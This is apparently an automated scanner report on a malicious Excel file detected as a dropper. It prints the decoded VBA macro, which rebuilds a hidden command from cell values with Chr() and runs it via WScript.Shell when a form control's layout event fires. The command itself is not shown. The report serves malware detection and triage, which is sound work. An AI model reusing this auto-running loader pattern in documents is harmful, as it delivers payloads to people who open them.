MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel document containing VBA macros that utilize WScript.Shell to execute a command. The script concatenates numerical values into a string, which is then passed to the exec method. This string likely represents a command to download and execute a secondary payload. The ClamAV detection name 'Xls.Dropper.Agent-8624723-0' further supports its nature as a dropper.
Heuristics 5
-
ClamAV: Xls.Dropper.Agent-8624723-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-8624723-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next Set WScript.echo = CreateObject("Wscript.shell").exec(Subtotal) Debug.Print "" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Set WScript.echo = CreateObject("Wscript.shell").exec(Subtotal) Debug.Print "" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1090 bytes |
SHA-256: fcf4333a20f187bed0cd4795ae43607dd4d74dffd7745766e9dcadd017f69d08 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "chat, 1, 0, MSForms, Frame"
Private Sub chat_Layout()
Dim Ns(3029)
For Each View In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
fork = Split(View, "!")
If fork(0) < 1 Then R = fork(0)
Ns(fork(0)) = fork(1)
Next
For Each sp In Ns
Subtotal = Subtotal + Chr(sp)
Next
On Error Resume Next
Set WScript.echo = CreateObject("Wscript.shell").exec(Subtotal)
Debug.Print ""
End Sub
Sub ToBut()
Application.WindowState = xlMinimized
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes |
SHA-256: 8f9ded5cdb2ce63bbf83a2a9b4eaef92d9a8bd17ab6ec6aa8b424d0f96879e05 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-8624723-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2352 bytes |
SHA-256: ee3343586ec51cc5b13cd95d3c426b1f126983d98bf86f874a75d4e360bdbd04 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.